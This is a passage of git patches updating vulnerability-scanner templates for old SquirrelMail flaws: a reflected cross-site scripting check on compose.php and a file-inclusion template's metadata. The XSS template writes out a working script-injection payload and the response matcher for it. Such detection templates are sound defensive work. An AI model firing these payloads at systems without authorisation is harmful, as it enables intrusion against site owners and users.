   description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
+  reference: https://www.exploit-db.com/exploits/24068
+  tags: xss,squirrelmail,cve2004,cve
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/mail/src/compose.php?mailbox=">&lt;script&gt;window.alert(document.domain)&lt;/script&gt;'
+      - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
     matchers-condition: and
     matchers:
       - type: status
@@ -19,11 +20,11 @@ requests:
           - 200
 
       - type: word
-        words:
-          - "alert('document.domain')"
         part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header

From 029b8f05fe94f4153d51485ce658afff4f1dd17d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:43:43 +0530
Subject: [PATCH 24/24] Update CVE-2006-2842.yaml

---
 cves/2006/CVE-2006-2842.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
index fe57273e03..243a171e68 100644
--- a/cves/2006/CVE-2006-2842.yaml
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -4,9 +4,9 @@ info:
   name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
   author: dhiyaneshDk
   severity: high
+  description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.  NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled.  Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE.  However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
   reference: https://www.exploit-db.com/exploits/27948
-  tags: cve2006,lfi,squirrelmail
-  description: "** DISPUTED **  PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.  NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled.  Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE.  However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
+  tags: cve2006,lfi,squirrelmail,cve
 
 requests:
   - method: GET